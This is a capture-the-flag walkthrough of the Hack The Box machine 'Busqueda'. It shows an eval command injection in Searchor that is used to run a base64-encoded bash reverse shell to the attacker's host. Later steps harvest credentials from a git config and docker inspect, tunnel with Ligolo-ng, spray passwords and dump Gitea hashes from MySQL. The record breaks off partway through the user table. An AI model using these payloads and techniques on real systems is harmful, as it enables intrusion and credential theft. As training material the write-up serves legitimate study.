# Busqueda - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Busqueda is a nice, easy-rated HTB machine created by [kavigihan](https://twitter.com/_kavigihan)

For user, we exploit a command injection vulnerability in Searchor.  
Root involves password reuse, `docker inspect`, port forwarding, changing password via MySQL and abuse of relative path.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.208
Nmap scan report for 10.10.11.208
Host is up (0.088s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80 -oN busqueda.nmap 10.10.11.208
Nmap scan report for 10.10.11.208
Host is up (0.085s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_  256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

The usual SSH (22) and HTTP (80) ports are open.

The website on port 80 redirects us to <http://searcher.htb/>  
Hence, we can add this line to `/etc/hosts`:

```text
10.10.11.208 searcher.htb
```

The home page:

![1](images/1.png)

I tried to find subdomains but couldn't find any.  
I also enumerated routes with `ffuf`:

```console
opcode@parrot$ ffuf -c -w ~/cybersec/wordlists/raft-small-words.txt -u http://searcher.htb/FUZZ -mc all -fs 207 2>/dev/null
search                  [Status: 405, Size: 153, Words: 16, Lines: 6, Duration: 148ms]
.                       [Status: 200, Size: 13519, Words: 3904, Lines: 430, Duration: 92ms]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 92ms]
```

The website allows us to select a search engine, enter a query, and generates a corresponding URL for that query.  
The footer claims that the website has been created with flask.  
It also mentions that [Searchor](https://github.com/ArjunSharda/Searchor) 2.4.0 is being used.

## Command injection in Searchor

I searched for "Security" in GitHub issues but found nothing.  
Since the version is known, I went to the "Releases" page and looked at the changelog for versions that immediately followed 2.4.0

In version 2.4.2, I found this pull request: [removed eval from search cli method](https://github.com/ArjunSharda/Searchor/pull/130)  
The following changes were made:

```diff
 @click.argument("query")
 def search(engine, query, open, copy):
     try:
-        url = eval(
-            f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})"
-        )
+        url = Engine[engine].search(query, copy_url=copy, open_web=open)
         click.echo(url)
         searchor.history.update(engine, query, url)
         if open:
```

It looks exploitable. If I had to draw a comparison, the situation is something like:

```py
controlled = input()
# url = eval(f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})")
x = eval(f"print('hello {controlled}')")
print(x)
```

Firstly, I wanted to know if there is a way to simultaneously evaluate multiple statements inside `eval`.  
After trying various things for a while, I found that commas work:

```py
>>> eval('1+1, 7*7')
(2, 49)
```

Also, the website makes a POST request to `/search` with the body:

```http
engine=Wikipedia&query=pizza
```

After some trial and error, I was able to inject extraneous characters without breaking the query:

```console
opcode@parrot$ curl -X POST 'http://searcher.htb/search' -d "engine=Wikipedia&query=pizza') # "
https://en.wikipedia.org/w/index.php?search=pizza
```

With these two keys, we can inject OS commands. Originally, I had tried:

```http
engine=Wikipedia&query=abc'), __import__(\'os\').system(\'sleep 5\') # 
```

But it fails. Surprisingly, it works without the backslashes:

```http
engine=Wikipedia&query=abc'), __import__('os').system('sleep 5') # 
```

With OS commands, the output is returned as well:

```console
opcode@parrot$ curl -X POST 'http://searcher.htb/search' -d "engine=Wikipedia&query=abc'), __import__('os').system('id') # "
uid=1000(svc) gid=1000(svc) groups=1000(svc)
('https://en.wikipedia.org/w/index.php?search=abc', 0)
```

To get a shell, we can use:

```console
opcode@parrot$ curl -X POST 'http://searcher.htb/search' -d "engine=Wikipedia&query=abc'), __import__('os').system('echo YmFzaCAtYyAnYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTQ3LzkwMDEgMD4mMScK | base64 -d | bash') # "
```

It drops us into a shell as user `svc`.  
I generated SSH keys with `ssh-keygen`:

```console
svc@busqueda:~$ ssh-keygen -t ecdsa -N ''
svc@busqueda:~$ mv .ssh/id_ecdsa.pub .ssh/authorized_keys
```

Then I transferred `id_ecdsa` to my system and used it to SSH to the box:

```console
opcode@parrot$ chmod 600 id_ecdsa
opcode@parrot$ ssh -i id_ecdsa svc@searcher.htb
```

## Enumeration for privesc

I tried running `pspy` on the box, but `/proc` has been mounted with `hidepid=invisible` option:

```console
svc@busqueda:~$ cat /proc/mounts | grep proc
proc /proc proc rw,nosuid,nodev,noexec,relatime,hidepid=invisible 0 0
```

Therefore, we cannot peek at commands being run in the context of other users.

Then, I ran [linpeas.sh](https://github.com/carlospolop/PEASS-ng) and it identified a bunch of issues:

```console
svc@busqueda:~$ echo $PATH
/home/svc/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
```

We fully control this directory, and it is in `$PATH`:

```console
svc@busqueda:~$ ls -la .local/bin/
total 16
drwxrwxr-x 2 svc svc 4096 Jun 15  2022 .
drwxrwxr-x 5 svc svc 4096 Jun 15  2022 ..
-rwxrwxr-x 1 svc svc  208 Jun 15  2022 flask
-rwxrwxr-x 1 svc svc  211 Jun 15  2022 pyjwt
```

The contents of `/etc/hosts` are also mildly intriguing:

```console
svc@busqueda:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 busqueda searcher.htb gitea.searcher.htb

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```

I checked `/etc/apache2/sites-enabled/000-default.conf` and learnt that the `gitea` subdomain is exposed to external network.  
I could not find it with `ffuf` because `gitea` is absent in `subdomains-top1million-20000.txt`.  
We can update `/etc/hosts`, and take a look:

```text
10.10.11.208 searcher.htb gitea.searcher.htb
```

![2](images/2.png)

We'd find two users: `cody` and `administrator`, but no public repos.  
At the time of box release, `gitea` 1.18.0 had no vulnerabilities.  
Also,

```console
svc@busqueda:~$ cat .gitconfig 
[user]
    email = cody@searcher.htb
    name = cody
[core]
    hooksPath = no-hooks
```

To look at internal ports, I've been using [miniss](https://github.com/noraj/miniss) instead of `ss` or `netstat` these days:

```console
svc@busqueda:~/.local/bin$ wget 10.10.14.147:8000/miniss
svc@busqueda:~/.local/bin$ chmod +x miniss
```

```console
svc@busqueda:~$ miniss
type local address      remote address     state       username (uid)
tcp  127.0.0.1:3306     0.0.0.0:0          LISTEN      root (0)
tcp  127.0.0.1:222      0.0.0.0:0          LISTEN      root (0)
tcp  127.0.0.1:43361    0.0.0.0:0          LISTEN      root (0)
tcp  0.0.0.0:22         0.0.0.0:0          LISTEN      root (0)
tcp  127.0.0.53:53      0.0.0.0:0          LISTEN      systemd-resolve (102)
tcp  127.0.0.1:3000     0.0.0.0:0          LISTEN      root (0)
tcp  127.0.0.1:5000     0.0.0.0:0          LISTEN      svc (1000)
tcp  127.0.0.1:3000     127.0.0.1:60108    ESTABLISHED root (0)
tcp  127.0.0.1:60100    127.0.0.1:3000     ESTABLISHED www-data (33)
tcp  172.19.0.1:49884   172.19.0.2:3000    ESTABLISHED root (0)
tcp  127.0.0.1:60108    127.0.0.1:3000     ESTABLISHED www-data (33)
tcp  172.19.0.1:49898   172.19.0.2:3000    ESTABLISHED root (0)
tcp  10.10.11.208:22    10.10.14.147:34728 ESTABLISHED root (0)
tcp  127.0.0.1:3000     127.0.0.1:60100    ESTABLISHED root (0)
tcp  127.0.0.1:3000     127.0.0.1:60124    ESTABLISHED root (0)
tcp  127.0.0.1:60124    127.0.0.1:3000     ESTABLISHED www-data (33)
tcp  172.19.0.1:49876   172.19.0.2:3000    ESTABLISHED root (0)
tcp  10.10.11.208:22    10.10.14.147:41022 ESTABLISHED root (0)
tcp  [::]:22            [::]:0             LISTEN      root (0)
tcp  [::]:80            [::]:0             LISTEN      root (0)
udp  127.0.0.1:52823    127.0.0.53:53      ESTABLISHED systemd-timesync (104)
udp  10.10.11.208:56157 8.8.8.8:53         ESTABLISHED systemd-resolve (102)
udp  127.0.0.53:53      0.0.0.0:0          CLOSE       systemd-resolve (102)
udp  0.0.0.0:68         0.0.0.0:0          CLOSE       root (0)
udp  10.10.11.208:41158 8.8.8.8:53         ESTABLISHED systemd-resolve (102)
```

The IP addresses like `172.19.0.1` indicate the use of docker or some other container runtime.

## Container-related enumeration

Now that we are aware of the existence of a container runtime, we can use [deepce.sh](https://github.com/stealthcopter/deepce) for some mild enumeration:

```console
svc@busqueda:~$ ./deepce.sh 
[--SNIP--]
===================================( Enumerating Platform )===================================
grep: /proc/1/cgroup: No such file or directory
grep: /proc/1/cgroup: No such file or directory
grep: /proc/1/cgroup: No such file or directory
[+] Inside Container ........ No
[+] User .................... svc
[+] Groups .................. svc
[+] Container tools ......... Yes
/usr/bin/docker
/snap/bin/lxc
[+] Docker Executable ....... /usr/bin/docker
[+] Docker version .......... 20.10.21
[+] Rootless ................ No
[+] User in Docker group .... No
[+] Docker Sock ............. Yes
srw-rw---- 1 root docker 0 Aug 24 05:22 /var/run/docker.sock
[+] Sock is writable ........ No
[+] Docker Version .......... 20.10.21
[+] CVE–2019–13139 .......... No
[+] CVE–2019–5736 ........... No
==================================( Enumerating Containers )==================================
==============================================================================================
```

The container runtime is docker.  
We can also use [cdk](https://github.com/cdk-team/CDK). I tried running `cdk eva`, but it didn't find anything useful.

We can also transfer a [statically-linked nmap binary](https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap) and scan for open ports on other containers in the default bridge network.

```console
svc@busqueda:~$ ./nmap -v -p- 172.19.0.1/29
[--SNIP--]
Nmap scan report for 172.19.0.1
Host is up (0.0010s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap scan report for 172.19.0.2
Host is up (0.0021s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE
3306/tcp  open  mysql
33060/tcp open  unknown

Nmap scan report for 172.19.0.3
Host is up (0.00033s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  unknown
```

The port 3000 on 172.19.0.2 is `gitea`  
We can forward those ports, but they won't help with lateral movement. (We don't have any credentials to try on SSH ports; the `gitea` service is accessible externally, and we don't have MySQL credentials)

## Finding credentials with `rusty-hog`

The only viable path is to look for credentials.  
`/var/www/app` has a `.git` directory. We can use `choctaw_hog` from [rusty-hog](https://github.com/newrelic/rusty-hog) to look for `git` secrets:

```console
svc@busqueda:~$ ./choctaw_hog /var/www/app/
[]
```

It didn't find anything. I also tried `duroc_hog` to look for secrets in the directory:

```console
svc@busqueda:~$ ./duroc_hog /var/www/app/
[
  {
    "stringsFound": [
      "http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git"
    ],
    "path": "/var/www/app/.git/config",
    "reason": "Credentials in absolute URL",
    "linenum": 7,
    "diff": "\turl = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git"
  }
]
```

I tried the credentials `cody:jh1usoih2bkjaspwe92` on the `gitea` instance, and it worked.  
The only repository there is `Searcher_site`, whose source was already available.

## `docker-inspect`

The password `jh1usoih2bkjaspwe92` is reused for the user `svc`:

```console
svc@busqueda:~$ sudo -l
[sudo] password for svc: 
Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *
```

Unfortunately, we cannot read the contents of `system-checkup.py`:

```console
svc@busqueda:~$ ls -la /opt/scripts/system-checkup.py
-rwx--x--x 1 root root 1903 Dec 24  2022 /opt/scripts/system-checkup.py
```

```console
svc@busqueda:~$ sudo python3 /opt/scripts/system-checkup.py *
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup
```

We can try those options:

```console
svc@busqueda:~$ sudo python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID   IMAGE                COMMAND                  CREATED        STATUS        PORTS                                             NAMES
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   7 months ago   Up 13 hours   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   7 months ago   Up 13 hours   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db
```

As expected, there are two containers running: `gitea` and `MySQL`.

```console
svc@busqueda:~$ sudo python3 /opt/scripts/system-checkup.py full-checkup
Something went wrong
```

```console
svc@busqueda:~$ sudo python3 /opt/scripts/system-checkup.py docker-inspect
Usage: /opt/scripts/system-checkup.py docker-inspect <format> <container_name>
```

I googled "docker inspect" and found <https://docs.docker.com/engine/reference/commandline/inspect/>  
It can be used to get detailed information on constructs controlled by docker.

Following the examples there, I was able to use it:

```console
svc@busqueda:~$ sudo python3 /opt/scripts/system-checkup.py docker-inspect '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' 960873171e2e
172.19.0.2
```

At the bottom of the page, the format `{{json .Config}}` is used. When I tried it:

```console
svc@busqueda:~$ sudo python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' 960873171e2e
```

I got:

```json
{
  "Hostname": "960873171e2e",
  "Domainname": "",
  "User": "",
  "AttachStdin": false,
  "AttachStdout": false,
  "AttachStderr": false,
  "ExposedPorts": {
    "22/tcp": {},
    "3000/tcp": {}
  },
  "Tty": false,
  "OpenStdin": false,
  "StdinOnce": false,
  "Env": [
    "USER_UID=115",
    "USER_GID=121",
    "GITEA__database__DB_TYPE=mysql",
    "GITEA__database__HOST=db:3306",
    "GITEA__database__NAME=gitea",
    "GITEA__database__USER=gitea",
    "GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",
    "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
    "USER=git",
    "GITEA_CUSTOM=/data/gitea"
  ],
  "Cmd": [
    "/bin/s6-svscan",
    "/etc/s6"
  ],
  "Image": "gitea/gitea:latest",
  "Volumes": {
    "/data": {},
    "/etc/localtime": {},
    "/etc/timezone": {}
  },
  "WorkingDir": "",
  "Entrypoint": [
    "/usr/bin/entrypoint"
  ],
  "OnBuild": null,
  "Labels": {
    "com.docker.compose.config-hash": "e9e6ff8e594f3a8c77b688e35f3fe9163fe99c66597b19bdd03f9256d630f515",
    "com.docker.compose.container-number": "1",
    "com.docker.compose.oneoff": "False",
    "com.docker.compose.project": "docker",
    "com.docker.compose.project.config_files": "docker-compose.yml",
    "com.docker.compose.project.working_dir": "/root/scripts/docker",
    "com.docker.compose.service": "server",
    "com.docker.compose.version": "1.29.2",
    "maintainer": "maintainers@gitea.io",
    "org.opencontainers.image.created": "2022-11-24T13:22:00Z",
    "org.opencontainers.image.revision": "9bccc60cf51f3b4070f5506b042a3d9a1442c73d",
    "org.opencontainers.image.source": "https://github.com/go-gitea/gitea.git",
    "org.opencontainers.image.url": "https://github.com/go-gitea/gitea"
  }
}
```

On the other container, I got:

```json
{
  "Hostname": "f84a6b33fb5a",
  "Domainname": "",
  "User": "",
  "AttachStdin": false,
  "AttachStdout": false,
  "AttachStderr": false,
  "ExposedPorts": {
    "3306/tcp": {},
    "33060/tcp": {}
  },
  "Tty": false,
  "OpenStdin": false,
  "StdinOnce": false,
  "Env": [
    "MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF",
    "MYSQL_USER=gitea",
    "MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh",
    "MYSQL_DATABASE=gitea",
    "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
    "GOSU_VERSION=1.14",
    "MYSQL_MAJOR=8.0",
    "MYSQL_VERSION=8.0.31-1.el8",
    "MYSQL_SHELL_VERSION=8.0.31-1.el8"
  ],
  "Cmd": [
    "mysqld"
  ],
  "Image": "mysql:8",
  "Volumes": {
    "/var/lib/mysql": {}
  },
  "WorkingDir": "",
  "Entrypoint": [
    "docker-entrypoint.sh"
  ],
  "OnBuild": null,
  "Labels": {
    "com.docker.compose.config-hash": "1b3f25a702c351e42b82c1867f5761829ada67262ed4ab55276e50538c54792b",
    "com.docker.compose.container-number": "1",
    "com.docker.compose.oneoff": "False",
    "com.docker.compose.project": "docker",
    "com.docker.compose.project.config_files": "docker-compose.yml",
    "com.docker.compose.project.working_dir": "/root/scripts/docker",
    "com.docker.compose.service": "db",
    "com.docker.compose.version": "1.29.2"
  }
}
```

There are two more passwords in the environment variables: `jI86kGUuj87guWr3RyF` and `yuiu1hoiu4i5ho1uh`

## Tunneling with `Ligolo-ng`

To access those ports directly, we can use [Ligolo-ng](https://github.com/nicocha30/ligolo-ng).  
We need to grab the `agent` and `proxy` binaries from <https://github.com/nicocha30/ligolo-ng/releases>.  
Next, we have to create a `tun` interface on the attacker machine:

```console
opcode@parrot$ sudo ip tuntap add user opcode mode tun ligolo
opcode@parrot$ sudo ip link set ligolo up
```

To verify that it worked, look for a ligolo interface created:

```console
opcode@parrot$ ip a
[--SNIP--]
8: ligolo: <NO-CARRIER,POINTOPOINT,MULTICAST,NOARP,UP> mtu 1500 qdisc fq_codel state DOWN group default qlen 500
    link/none 
```

Now run the `proxy` binary on attacker machine:

```console
opcode@parrot$ ./proxy -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended) 
INFO[0000] Listening on 0.0.0.0:11601                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

Made in France ♥ by @Nicocha30!

ligolo-ng »  
```

Execute the `agent` on victim machine:

```console
www-data@icinga:/tmp$ ./agent -connect 10.10.14.147:11601 -ignore-cert
```

On the attacker machine, this line should show up:

```console
ligolo-ng » INFO[0019] Agent joined.                                 name=svc@busqueda remote="10.10.11.208:55404"
```

Therefore, we can use the `session` command to select this agent:

```console
ligolo-ng » session
? Specify a session : 1 - svc@busqueda - 10.10.11.208:55404
[Agent : svc@busqueda] »  
```

Display the network configuration of the agent using the `ifconfig` command:

```console
[Agent : svc@busqueda] » ifconfig
┌────────────────────────────────────┐
│ Interface 0                        │
├──────────────┬─────────────────────┤
│ Name         │ lo                  │
│ Hardware MAC │                     │
│ MTU          │ 65536               │
│ Flags        │ up|loopback|running │
│ IPv4 Address │ 127.0.0.1/8         │
│ IPv6 Address │ ::1/128             │
└──────────────┴─────────────────────┘
┌─────────────────────────────────────────────────┐
│ Interface 1                                     │
├──────────────┬──────────────────────────────────┤
│ Name         │ eth0                             │
│ Hardware MAC │ 00:50:56:b9:41:45                │
│ MTU          │ 1500                             │
│ Flags        │ up|broadcast|multicast|running   │
│ IPv4 Address │ 10.10.11.208/23                  │
│ IPv6 Address │ dead:beef::250:56ff:feb9:4145/64 │
│ IPv6 Address │ fe80::250:56ff:feb9:4145/64      │
└──────────────┴──────────────────────────────────┘
┌───────────────────────────────────────┐
│ Interface 2                           │
├──────────────┬────────────────────────┤
│ Name         │ docker0                │
│ Hardware MAC │ 02:42:4f:32:b7:3a      │
│ MTU          │ 1500                   │
│ Flags        │ up|broadcast|multicast │
│ IPv4 Address │ 172.17.0.1/16          │
└──────────────┴────────────────────────┘
┌───────────────────────────────────────┐
│ Interface 3                           │
├──────────────┬────────────────────────┤
│ Name         │ br-c954bf22b8b2        │
│ Hardware MAC │ 02:42:f3:43:5b:74      │
│ MTU          │ 1500                   │
│ Flags        │ up|broadcast|multicast │
│ IPv4 Address │ 172.20.0.1/16          │
└──────────────┴────────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 4                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ br-cbf2c5ce8e95                │
│ Hardware MAC │ 02:42:01:f1:4c:f0              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 172.19.0.1/16                  │
│ IPv6 Address │ fe80::42:1ff:fef1:4cf0/64      │
└──────────────┴────────────────────────────────┘
┌───────────────────────────────────────┐
│ Interface 5                           │
├──────────────┬────────────────────────┤
│ Name         │ br-fba5a3e31476        │
│ Hardware MAC │ 02:42:88:69:75:85      │
│ MTU          │ 1500                   │
│ Flags        │ up|broadcast|multicast │
│ IPv4 Address │ 172.18.0.1/16          │
└──────────────┴────────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 6                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ vethb31cce7                    │
│ Hardware MAC │ 9a:6d:3c:10:87:c8              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv6 Address │ fe80::986d:3cff:fe10:87c8/64   │
└──────────────┴────────────────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 7                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ vethc3983db                    │
│ Hardware MAC │ 46:4c:a2:d7:ac:4a              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv6 Address │ fe80::84bb:79ff:fe9f:bfa/64    │
└──────────────┴────────────────────────────────┘
```

We're interested in the Interface 4 subnet. Let us add a route to that on the attacker machine:

```console
opcode@parrot$ sudo ip route add 172.19.0.0/16 dev ligolo
```

If you use docker with user-defined bridges or `docker-compose`, this subnet might not be free on your system.  
In that case, I recommend removing all networks which are not pre-defined:

```console
opcode@parrot$ docker network ls          
NETWORK ID     NAME      DRIVER    SCOPE
345f9b8d3a06   bridge    bridge    local
53e0e5ba969f   vh_ssti   bridge    local
36ad502847fd   pyjail    bridge    local
c23ab258e691   host      host      local
9088a8f72a23   none      null      local
opcode@parrot$ docker network rm 53e0e5ba969f
opcode@parrot$ docker network rm 36ad502847fd
```

A restart is also needed for it to take effect.

Now, we can start the tunnel:

```console
[Agent : svc@busqueda] » start
[Agent : svc@busqueda] » INFO[1420] Starting tunnel to svc@busqueda
```

We can now access all those internal ports directly:

```console
opcode@parrot$ sudo nmap -PE -p 22,80,3000,3306 172.19.0.1-3

Nmap scan report for 172.19.0.1
Host is up (0.14s latency).

PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
3000/tcp closed ppp
3306/tcp closed mysql

Nmap scan report for 172.19.0.2
Host is up (0.16s latency).

PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   closed http
3000/tcp closed ppp
3306/tcp open   mysql

Nmap scan report for 172.19.0.3
Host is up (0.19s latency).

PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   closed http
3000/tcp open   ppp
3306/tcp closed mysql
```

## Password spray with CrackMapExec

Afterwards, I created `passwords.txt`:

```text
jh1usoih2bkjaspwe92
jI86kGUuj87guWr3RyF
yuiu1hoiu4i5ho1uh
```

And `users.txt`:

```text
cody
svc
git
root
```

I wanted to use [CrackMapExec](https://github.com/mpgn/CrackMapExec) to spray these passwords across all the containers.  
I started it in a container with a bind mount to ease file sharing:

```console
opcode@parrot$ docker run -it --entrypoint=/bin/bash --rm --name cmexec --mount type=bind,source=/home/opcode/CTF,target=/root cme:latest
```

We can now attempt the password spray:

```console
root@880ce3cbb1e0:~# cme ssh 172.19.0.1-3 -u ~/users.txt -p ~/passwords.txt 
SSH         172.19.0.1      22     172.19.0.1       [*] SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
SSH         172.19.0.3      22     172.19.0.3       [*] SSH-2.0-OpenSSH_9.0
SSH         172.19.0.1      22     172.19.0.1       [-] cody:jh1usoih2bkjaspwe92 Authentication failed.
SSH         172.19.0.1      22     172.19.0.1       [+] svc:jh1usoih2bkjaspwe92  - shell access!
SSH         172.19.0.3      22     172.19.0.3       [-] cody:jh1usoih2bkjaspwe92 Bad authentication type; allowed types: ['publickey']
SSH         172.19.0.3      22     172.19.0.3       [-] svc:jh1usoih2bkjaspwe92 Bad authentication type; allowed types: ['publickey']
SSH         172.19.0.3      22     172.19.0.3       [-] git:jh1usoih2bkjaspwe92 Bad authentication type; allowed types: ['publickey']
SSH         172.19.0.3      22     172.19.0.3       [-] root:jh1usoih2bkjaspwe92 Bad authentication type; allowed types: ['publickey']
SSH         172.19.0.3      22     172.19.0.3       [-] cody:jI86kGUuj87guWr3RyF Bad authentication type; allowed types: ['publickey']
SSH         172.19.0.3      22     172.19.0.3       [-] svc:jI86kGUuj87guWr3RyF Bad authentication type; allowed types: ['publickey']
SSH         172.19.0.3      22     172.19.0.3       [-] git:jI86kGUuj87guWr3RyF Bad authentication type; allowed types: ['publickey']
SSH         172.19.0.3      22     172.19.0.3       [-] root:jI86kGUuj87guWr3RyF Bad authentication type; allowed types: ['publickey']
SSH         172.19.0.3      22     172.19.0.3       [-] cody:yuiu1hoiu4i5ho1uh Bad authentication type; allowed types: ['publickey']
SSH         172.19.0.3      22     172.19.0.3       [-] svc:yuiu1hoiu4i5ho1uh Bad authentication type; allowed types: ['publickey']
SSH         172.19.0.3      22     172.19.0.3       [-] git:yuiu1hoiu4i5ho1uh Bad authentication type; allowed types: ['publickey']
SSH         172.19.0.3      22     172.19.0.3       [-] root:yuiu1hoiu4i5ho1uh Bad authentication type; allowed types: ['publickey']
Running CME against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
```

No luck here. `172.19.0.1` is the host, and we already knew about that.

## Exploring MySQL database

Since we have the MySQL credentials, we can explore them as well:

```console
opcode@parrot$ mysql -h 172.19.0.2 --user=root --password=jI86kGUuj87guWr3RyF
```

```console
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| gitea              |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
```

`gitea` is the only non-default database; we can use it.

```console
mysql> use gitea;
Database changed

mysql> show tables;
+---------------------------+
| Tables_in_gitea           |
+---------------------------+
| access                    |
| access_token              |
| action                    |
| app_state                 |
| attachment                |
| badge                     |
| collaboration             |
| comment                   |
| commit_status             |
| commit_status_index       |
| deleted_branch            |
| deploy_key                |
| email_address             |
| email_hash                |
| external_login_user       |
| follow                    |
| foreign_reference         |
| gpg_key                   |
| gpg_key_import            |
| hook_task                 |
| issue                     |
| issue_assignees           |
| issue_content_history     |
| issue_dependency          |
| issue_index               |
| issue_label               |
| issue_user                |
| issue_watch               |
| label                     |
| language_stat             |
| lfs_lock                  |
| lfs_meta_object           |
| login_source              |
| milestone                 |
| mirror                    |
| notice                    |
| notification              |
| oauth2_application        |
| oauth2_authorization_code |
| oauth2_grant              |
| org_user                  |
| package                   |
| package_blob              |
| package_blob_upload       |
| package_file              |
| package_property          |
| package_version           |
| project                   |
| project_board             |
| project_issue             |
| protected_branch          |
| protected_tag             |
| public_key                |
| pull_auto_merge           |
| pull_request              |
| push_mirror               |
| reaction                  |
| release                   |
| renamed_branch            |
| repo_archiver             |
| repo_indexer_status       |
| repo_redirect             |
| repo_topic                |
| repo_transfer             |
| repo_unit                 |
| repository                |
| review                    |
| review_state              |
| session                   |
| star                      |
| stopwatch                 |
| system_setting            |
| task                      |
| team                      |
| team_invite               |
| team_repo                 |
| team_unit                 |
| team_user                 |
| topic                     |
| tracked_time              |
| two_factor                |
| upload                    |
| user                      |
| user_badge                |
| user_open_id              |
| user_redirect             |
| user_setting              |
| version                   |
| watch                     |
| webauthn_credential       |
| webhook                   |
+---------------------------+
```

I see two important tables: `repository` and `user`:

```console
mysql> select id,owner_name,name,description from repository;
+----+---------------+---------------+-----------------------------------------+
| id | owner_name    | name          | description                             |
+----+---------------+---------------+-----------------------------------------+
|  3 | administrator | scripts       |                                         |
|  4 | cody          | Searcher_site | Flask Application for the Searcher Site |
+----+---------------+---------------+-----------------------------------------+

mysql> select * from user\G
*************************** 1. row ***************************
                            id: 1
                    lower_name: administrator
                          name: administrator
                     full_name: 
                         email: administrator@gitea.searcher.htb
            keep_email_private: 0
email_notifications_preference: enabled
                        passwd: ba598d99c2202491d36ecf13d5c28b74e2738b07286edc7388a2fc870196f6c4da6565ad9ff68b1d28a31eeedb1554b5dcc2
              passwd_hash_algo: pbkdf2
          must_change_password: 0
                    login_type: 0
                  login_source: 0
                    login_name: 
                          type: 0
                      location: 
                       website: 
                         rands: 44748ed806accc9d96bf9f495979b742
                          salt: a378d3f64143b284f104c926b8b49dfb
                      language: en-US
                   description: 
                  created_unix: 1672857920
                  updated_unix: 1680531979
               last_login_unix: 1673083022
          last_repo_visibility: 1
             max_repo_creation: -1
                     is_active: 1
                      is_admin: 1
                 is_restricted: 0
                allow_git_hook: 0
            allow_import_local: 0
     allow_create_organization: 1
                prohibit_login: 0
                        avatar: 
                  avatar_email: administrator@gitea.searcher.htb
             use_custom_avatar: 0
                 num_followers: 0
                 num_following: 0
                     num_stars: 0
                     num_repos: 1
                     num_teams: 0
                   num_members: 0
                    visibility: 0
 repo_admin_change_team_access: 0
               diff_view_style: 
                         theme: auto
         keep_activity_private: 0
*************************** 2. row ***************************
                            id: 2
                    lower_name: cody
                          name: cody
                     full_name: 
                         email: cody@gitea.searcher.htb
            keep_email_private: 0
email_notifications_preference: enabled
